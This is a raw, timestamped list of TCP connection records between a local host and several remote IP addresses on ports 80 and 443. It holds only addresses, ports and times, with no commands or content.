Jan 11, 2025 07:23:58.046039104 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.046056032 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.046159983 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.051656008 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.051740885 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.051748037 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.051801920 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.057534933 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.057636023 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.064483881 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.064585924 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.064591885 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.064640999 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.086195946 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.086280107 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.086323977 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.086368084 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.086381912 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.086416006 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.086416006 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.086431026 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.086599112 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.086673021 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.086807966 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.086865902 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.086879015 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.086927891 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.088139057 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.088200092 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.088219881 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.088227034 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.088244915 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.088282108 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.093624115 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.093727112 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.093734026 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.093790054 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.099169016 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.099294901 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.099302053 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.099354982 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.103957891 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.104038954 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.104046106 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.104093075 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.108994961 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.109077930 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.109086037 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.109133959 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.113617897 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.113730907 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.113738060 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.113785982 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.118282080 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.118370056 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.118376017 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.118422985 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.122926950 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.123023987 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.123029947 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.123078108 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.127526045 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.127655983 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.127662897 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.127722979 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.132121086 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.132201910 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.132211924 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.132261038 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.136770964 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.136859894 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.136867046 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.136920929 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.141043901 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.141140938 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.141146898 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.141189098 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.146544933 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.146631002 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.146641016 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.146696091 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.146702051 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.146723032 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:58.146752119 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.146775961 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.146817923 CET	49737	443	192.168.2.4	142.250.185.225
Jan 11, 2025 07:23:58.146831989 CET	443	49737	142.250.185.225	192.168.2.4
Jan 11, 2025 07:23:59.182476997 CET	49754	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:23:59.187264919 CET	80	49754	193.122.6.168	192.168.2.4
Jan 11, 2025 07:23:59.187339067 CET	49754	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:23:59.187527895 CET	49754	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:23:59.192332983 CET	80	49754	193.122.6.168	192.168.2.4
Jan 11, 2025 07:23:59.817672014 CET	80	49754	193.122.6.168	192.168.2.4
Jan 11, 2025 07:23:59.821974039 CET	49754	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:23:59.826776028 CET	80	49754	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:00.008609056 CET	80	49754	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:00.060010910 CET	49754	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:00.909054041 CET	49765	443	192.168.2.4	104.21.96.1
Jan 11, 2025 07:24:00.909096003 CET	443	49765	104.21.96.1	192.168.2.4
Jan 11, 2025 07:24:00.909204960 CET	49765	443	192.168.2.4	104.21.96.1
Jan 11, 2025 07:24:00.912245035 CET	49765	443	192.168.2.4	104.21.96.1
Jan 11, 2025 07:24:00.912269115 CET	443	49765	104.21.96.1	192.168.2.4
Jan 11, 2025 07:24:01.373403072 CET	443	49765	104.21.96.1	192.168.2.4
Jan 11, 2025 07:24:01.373475075 CET	49765	443	192.168.2.4	104.21.96.1
Jan 11, 2025 07:24:01.377187967 CET	49765	443	192.168.2.4	104.21.96.1
Jan 11, 2025 07:24:01.377208948 CET	443	49765	104.21.96.1	192.168.2.4
Jan 11, 2025 07:24:01.377526999 CET	443	49765	104.21.96.1	192.168.2.4
Jan 11, 2025 07:24:01.381855965 CET	49765	443	192.168.2.4	104.21.96.1
Jan 11, 2025 07:24:01.423337936 CET	443	49765	104.21.96.1	192.168.2.4
Jan 11, 2025 07:24:01.513091087 CET	443	49765	104.21.96.1	192.168.2.4
Jan 11, 2025 07:24:01.513155937 CET	443	49765	104.21.96.1	192.168.2.4
Jan 11, 2025 07:24:01.513501883 CET	49765	443	192.168.2.4	104.21.96.1
Jan 11, 2025 07:24:01.548064947 CET	49765	443	192.168.2.4	104.21.96.1
Jan 11, 2025 07:24:07.400283098 CET	49754	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:07.405206919 CET	80	49754	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:07.587101936 CET	80	49754	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:07.599363089 CET	49810	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:07.599405050 CET	443	49810	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:07.599466085 CET	49810	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:07.599889994 CET	49810	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:07.599904060 CET	443	49810	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:07.638243914 CET	49754	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:08.209079027 CET	443	49810	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:08.209167004 CET	49810	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:08.210882902 CET	49810	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:08.210908890 CET	443	49810	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:08.211186886 CET	443	49810	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:08.212591887 CET	49810	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:08.255347967 CET	443	49810	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:08.255426884 CET	49810	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:08.255443096 CET	443	49810	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:08.519787073 CET	443	49810	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:08.519853115 CET	443	49810	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:08.519922018 CET	49810	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:08.520421028 CET	49810	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:08.682204008 CET	49754	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:08.683466911 CET	49816	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:08.687483072 CET	80	49754	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:08.687647104 CET	49754	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:08.688498974 CET	80	49816	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:08.688673973 CET	49816	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:08.688849926 CET	49816	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:08.693648100 CET	80	49816	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:09.336906910 CET	80	49816	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:09.339245081 CET	49822	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:09.339291096 CET	443	49822	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:09.339370966 CET	49822	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:09.340478897 CET	49822	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:09.340507030 CET	443	49822	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:09.388272047 CET	49816	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:09.961101055 CET	443	49822	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:09.962891102 CET	49822	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:09.962918997 CET	443	49822	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:09.962991953 CET	49822	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:09.963001966 CET	443	49822	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:10.283566952 CET	443	49822	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:10.283648014 CET	443	49822	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:10.283731937 CET	49822	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:10.284362078 CET	49822	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:10.289556026 CET	49826	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:10.294433117 CET	80	49826	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:10.294540882 CET	49826	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:10.294660091 CET	49826	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:10.299468994 CET	80	49826	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:10.950201035 CET	80	49826	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:10.953571081 CET	49832	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:10.953687906 CET	443	49832	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:10.953820944 CET	49832	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:10.954173088 CET	49832	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:10.954205036 CET	443	49832	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:10.997673988 CET	49826	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:11.562393904 CET	443	49832	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:11.564620018 CET	49832	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:11.564707041 CET	443	49832	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:11.564810991 CET	49832	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:11.564826012 CET	443	49832	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:11.952039003 CET	443	49832	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:11.952122927 CET	443	49832	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:11.952184916 CET	49832	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:11.952685118 CET	49832	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:11.957087994 CET	49826	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:11.958359003 CET	49838	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:11.962007046 CET	80	49826	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:11.962070942 CET	49826	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:11.963131905 CET	80	49838	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:11.963202000 CET	49838	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:11.963365078 CET	49838	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:11.968080044 CET	80	49838	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:12.607991934 CET	80	49838	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:12.612281084 CET	49844	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:12.612320900 CET	443	49844	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:12.612392902 CET	49844	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:12.612714052 CET	49844	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:12.612725973 CET	443	49844	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:12.653915882 CET	49838	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:13.216093063 CET	443	49844	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:13.220941067 CET	49844	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:13.220966101 CET	443	49844	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:13.221051931 CET	49844	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:13.221056938 CET	443	49844	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:13.496912003 CET	443	49844	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:13.497013092 CET	443	49844	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:13.497068882 CET	49844	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:13.497646093 CET	49844	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:13.501480103 CET	49838	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:13.502744913 CET	49851	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:13.506577969 CET	80	49838	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:13.506668091 CET	49838	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:13.507596016 CET	80	49851	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:13.507684946 CET	49851	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:13.507854939 CET	49851	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:13.512598991 CET	80	49851	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:14.137198925 CET	80	49851	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:14.139338017 CET	49856	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:14.139372110 CET	443	49856	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:14.139527082 CET	49856	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:14.139834881 CET	49856	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:14.139848948 CET	443	49856	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:14.185323954 CET	49851	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:14.743489027 CET	443	49856	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:14.745194912 CET	49856	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:14.745223999 CET	443	49856	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:14.745309114 CET	49856	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:14.745321035 CET	443	49856	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:14.971052885 CET	443	49856	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:14.971132040 CET	443	49856	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:14.971189022 CET	49856	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:14.971566916 CET	49856	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:14.974524021 CET	49851	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:14.975939035 CET	49862	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:14.979504108 CET	80	49851	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:14.979549885 CET	49851	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:14.980741024 CET	80	49862	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:14.980799913 CET	49862	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:14.980933905 CET	49862	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:14.985692024 CET	80	49862	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:15.616818905 CET	80	49862	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:15.618446112 CET	49868	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:15.618547916 CET	443	49868	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:15.618634939 CET	49868	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:15.618967056 CET	49868	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:15.619019032 CET	443	49868	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:15.669636011 CET	49862	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:16.251861095 CET	443	49868	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:16.253526926 CET	49868	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:16.253592968 CET	443	49868	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:16.253669977 CET	49868	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:16.253696918 CET	443	49868	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:16.640450001 CET	443	49868	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:16.640533924 CET	443	49868	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:16.640691996 CET	49868	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:16.659740925 CET	49868	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:16.753094912 CET	49862	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:16.754228115 CET	49879	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:16.758112907 CET	80	49862	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:16.759084940 CET	80	49879	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:16.759155035 CET	49862	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:16.759167910 CET	49879	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:16.759533882 CET	49879	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:16.764398098 CET	80	49879	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:17.406584978 CET	80	49879	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:17.407968998 CET	49883	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:17.408001900 CET	443	49883	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:17.408320904 CET	49883	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:17.408411980 CET	49883	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:17.408420086 CET	443	49883	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:17.450819016 CET	49879	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:18.015279055 CET	443	49883	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:18.016742945 CET	49883	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:18.016762018 CET	443	49883	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:18.016809940 CET	49883	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:18.016819000 CET	443	49883	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:18.318092108 CET	443	49883	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:18.318171024 CET	443	49883	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:18.318293095 CET	49883	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:18.318845987 CET	49883	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:18.322185993 CET	49879	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:18.323245049 CET	49891	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:18.327604055 CET	80	49879	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:18.327658892 CET	49879	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:18.328097105 CET	80	49891	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:18.328172922 CET	49891	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:18.328382969 CET	49891	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:18.333385944 CET	80	49891	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:18.954214096 CET	80	49891	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:18.957782030 CET	49895	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:18.957833052 CET	443	49895	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:18.957942009 CET	49895	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:18.958255053 CET	49895	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:18.958268881 CET	443	49895	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:18.997792006 CET	49891	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:19.584289074 CET	443	49895	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:19.603483915 CET	49895	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:19.603516102 CET	443	49895	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:19.603599072 CET	49895	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:19.603605986 CET	443	49895	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:19.910132885 CET	443	49895	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:19.910212040 CET	443	49895	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:19.910276890 CET	49895	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:19.910900116 CET	49895	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:19.914987087 CET	49891	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:19.916449070 CET	49903	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:19.919979095 CET	80	49891	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:19.920032978 CET	49891	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:19.921220064 CET	80	49903	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:19.921288967 CET	49903	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:19.921390057 CET	49903	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:19.926119089 CET	80	49903	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:20.544184923 CET	80	49903	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:20.545732021 CET	49904	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:20.545756102 CET	443	49904	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:20.545883894 CET	49904	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:20.546274900 CET	49904	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:20.546284914 CET	443	49904	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:20.591485977 CET	49903	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:21.151304007 CET	443	49904	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:21.152997017 CET	49904	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:21.153006077 CET	443	49904	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:21.153157949 CET	49904	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:21.153168917 CET	443	49904	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:21.383862972 CET	443	49904	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:21.383944035 CET	443	49904	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:21.384037971 CET	49904	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:21.384474039 CET	49904	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:21.387888908 CET	49903	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:21.388976097 CET	49915	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:21.392865896 CET	80	49903	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:21.392930984 CET	49903	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:21.393867016 CET	80	49915	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:21.394026041 CET	49915	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:21.394246101 CET	49915	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:21.399099112 CET	80	49915	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:22.039782047 CET	80	49915	193.122.6.168	192.168.2.4
Jan 11, 2025 07:24:22.041038990 CET	49917	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:22.041059017 CET	443	49917	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:22.041119099 CET	49917	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:22.041359901 CET	49917	443	192.168.2.4	149.154.167.220
Jan 11, 2025 07:24:22.041373968 CET	443	49917	149.154.167.220	192.168.2.4
Jan 11, 2025 07:24:22.091509104 CET	49915	80	192.168.2.4	193.122.6.168
Jan 11, 2025 07:24:22.650839090 CET	443	49917	149.154.167.220	192.168.2.4
